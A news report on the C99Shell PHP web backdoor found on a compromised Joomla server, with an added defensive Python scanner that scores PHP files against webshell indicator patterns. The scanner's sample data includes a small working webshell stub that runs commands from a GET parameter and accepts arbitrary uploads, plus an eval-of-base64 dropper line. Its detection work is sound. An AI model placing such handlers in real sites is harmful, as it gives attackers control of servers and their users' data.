The C99Shell PHP backdoor, originally spotted in 2007, is still around, and is still a danger to both web server operators and end-users.
After getting a tip from a designer about a hacked Joomla page, Panda Security malware researcher Bart Blaze discovered that a newer version (2.1) of this script-based web Trojan has been used to compromise a web server.
The same server has been infected with other PHP backdoors, one of which appears designed specifically to target mobile users.
But C99Shell is more than enough for attackers to take control of the server. The malware allows them to download/upload files from and to the server (via FTP), have full access to files on the hard disk, run shell commands, access and modify databases, and so on.
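The capabilities listed above (shell command execution, file upload, database access) are exactly what a defender can look for when triaging PHP files on a suspected-compromised web server. The following is an added example, not code from Panda Security or from the article; it scans PHP sources against a constructed, weighted set of webshell indicators and flags files for manual review. The indicator patterns, the weights, the review threshold and the sample file contents are all assumptions for illustration, not an authoritative C99Shell signature.

```python
"""Heuristic PHP webshell indicator scanner (added example, constructed indicators)."""
import re
from typing import Dict, List, Tuple

# Weighted indicators. These are a constructed heuristic set drawn from the
# behaviour webshells commonly need (run commands, move uploaded files, decode
# and execute payloads, touch the database); they are assumptions, not a
# vendor signature set.
INDICATORS: Dict[str, Tuple[re.Pattern, int]] = {
    "c99shell-marker": (re.compile(r"c99shell", re.I), 10),
    "eval-decoded-payload": (
        re.compile(r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I), 8),
    "exec-of-request-input": (
        re.compile(r"\b(?:system|passthru|shell_exec|exec|popen|eval)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I), 9),
    "command-execution": (
        re.compile(r"\b(?:system|passthru|shell_exec|exec|popen|proc_open)\s*\(", re.I), 4),
    "file-upload-handler": (re.compile(r"\bmove_uploaded_file\s*\(", re.I), 2),
    "database-access": (re.compile(r"\bmysqli?_(?:connect|query)\s*\(", re.I), 1),
}

# Files scoring at or above this (assumed) threshold are queued for human review.
REVIEW_THRESHOLD = 8


def scan_php_source(source: str) -> List[str]:
    """Return the sorted names of every indicator that matches the PHP source."""
    return sorted(name for name, (pattern, _weight) in INDICATORS.items() if pattern.search(source))


def risk_score(hits: List[str]) -> int:
    """Sum the weights of the matched indicators."""
    return sum(INDICATORS[name][1] for name in hits)


def scan_files(files: Dict[str, str]) -> Dict[str, dict]:
    """Scan a mapping of path -> PHP source and build a per-file triage report."""
    report: Dict[str, dict] = {}
    for path, source in files.items():
        hits = scan_php_source(source)
        score = risk_score(hits)
        report[path] = {"hits": hits, "score": score, "review": score >= REVIEW_THRESHOLD}
    return report


# Constructed sample files: a benign contact form, a file carrying a C99Shell
# version banner plus command/upload handlers, and an obfuscated dropper stub.
SAMPLE_FILES: Dict[str, str] = {
    "contact.php": (
        "<?php\n"
        "$conn = mysqli_connect('localhost', 'app', 'pw', 'site');\n"
        "$name = htmlspecialchars($_POST['name'] ?? '');\n"
        "echo \"Thanks, $name\";\n"
    ),
    "images/.cache.php": (
        "<?php\n"
        "/* c99shell v. 2.1 */\n"
        "if (isset($_GET['cmd'])) { echo '<pre>'; passthru($_GET['cmd']); echo '</pre>'; }\n"
        "if (isset($_FILES['f'])) { move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']); }\n"
    ),
    "wp-content/uploads/x.php": "<?php eval(base64_decode('...')); ?>",
}


if __name__ == "__main__":
    for path, result in scan_files(SAMPLE_FILES).items():
        flag = "REVIEW" if result["review"] else "ok"
        print(f"{flag:6} score={result['score']:3} {path} hits={result['hits']}")
```

Run against a real document root by reading each `.php` file into the `files` mapping passed to `scan_files`; the weighted scoring keeps a legitimate contact form (one database call) below the review threshold, while the C99Shell banner, the request-driven `passthru` and the upload handler push the hidden file well above it. Heuristics like these complement, rather than replace, file-integrity monitoring against a known-good copy of the site.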
“In short, it can pretty much do everything you want, which results in end-users getting malware onto their systems and/or data getting stolen and/or personal information compromised,” says Blaze.
More bad news: AV detection for this variant is still relatively low.
“Securing your website is not only beneficial for you, but also for your customers and other visitors,” the researcher pointed out, and offered advice and links to resources on how to prevent this type of compromise.